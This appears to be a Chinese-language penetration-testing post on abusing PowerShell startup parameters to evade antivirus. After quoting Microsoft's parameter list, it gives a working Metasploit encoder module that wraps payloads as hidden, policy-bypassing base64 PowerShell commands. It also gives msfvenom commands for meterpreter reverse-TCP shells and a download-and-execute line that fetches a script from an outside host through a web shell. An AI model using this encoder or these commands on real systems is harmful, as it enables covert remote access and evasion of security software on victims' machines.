Windows PowerShell的強大,而且內置,在滲透過程當中,也讓滲透變得更加有趣。而安全軟件的對抗查殺也逐漸開始針對powershell的一切行爲。
在https://technet.microsoft.com,看到文檔以下:html
Here is a listing of the available startup parameters:
-Command
Specifies the command text to execute as though it were typed at the PowerShell command prompt.
-EncodedCommand
Specifies the base64
-encoded
command text to execute.
-ExecutionPolicy
Sets the default execution policy for the console session.
-File
Sets the name of a script fi le to execute.
-InputFormat
Sets the format for data sent to PowerShell as either text string or serialized XML. The default format is XML. Valid values are text and XML.
-NoExit
Does not exit after running startup commands. This parameter is useful when you run PowerShell commands or scripts via the command prompt (cmd.exe).
-NoLogo
Starts the PowerShell console without displaying the copyright banner.
-Noninteractive
Starts the PowerShell console in non
-interactive
mode. In this mode, PowerShell does not present an interactive prompt to the user.
-NoProfile
Tells the PowerShell console not to load the current user’s profile.
-OutputFormat
Sets the format for output as either text string or serialized XML. The default format is text. Valid values are text and XML.
-PSConsoleFile
Loads the specified Windows PowerShell console file. Console files end with the .psc1 extension and can be used to ensure that specific snap
-in
extensions are loaded and available. You can create a console file using
Export-Console
in Windows PowerShell.
-Sta
Starts PowerShell in single
-threaded
mode.
-Version
Sets the version of Windows PowerShell to use for compatibility, such as 1.0.
-WindowStyle
Sets the window style as Normal, Minimized, Maximized, or Hidden. The default is Normal.
針對它的特性,本地測試:Add
-Type
-AssemblyName
PresentationFramework;[System.Windows.MessageBox]::Show(
'Micropoor'
)
git
# copy base64.rb to metasploit-framework/embedded/framework/modules/encoders/powershell.If powershell is empty,mkdir powershell.
# E.g
# msf encoder(powershell/base64) > use exploit/multi/handler
# msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
# payload => windows/x64/meterpreter/reverse_tcp
# msf exploit(multi/handler) > exploit
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.
# [*] Started reverse TCP handler on xx.1xx.xx.xx:xx
class MetasploitModule < Msf::Encoder
Rank = NormalRanking
def initialize
super(
'Name' => 'Powershell Base64 Encoder',
'Description' => %q{
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.
},
'Author' => 'Micropoor',
'Arch' => ARCH_CMD,
'Platform' => 'win')
register_options([
OptBool.new('payload', [ false, 'Use payload ', false ]),
OptBool.new('x64', [ false, 'Use syswow64 powershell', false ])
])
end
def encode_block(state, buf)
base64 = Rex::Text.encode_base64(Rex::Text.to_unicode(buf))
cmd = ''
if datastore['x64']
cmd += 'c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe '
else
cmd += 'powershell.exe '
end
if datastore['payload']
cmd += '-windowstyle hidden -exec bypass -NoExit '
end
cmd += "-EncodedCommand #{base64}"
end
end
# if use caidao
# execute echo powershell -windowstyle hidden -exec bypass -c \""IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.117/xxx.ps1');\"" |msfvenom -e x64/xor4 --arch x64 --platform windows
# xxx.ps1 is msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=xx -f psh-reflection --arch x64 --platform windows | msfvenom -e powershell/base64 --arch x64 --platform windows.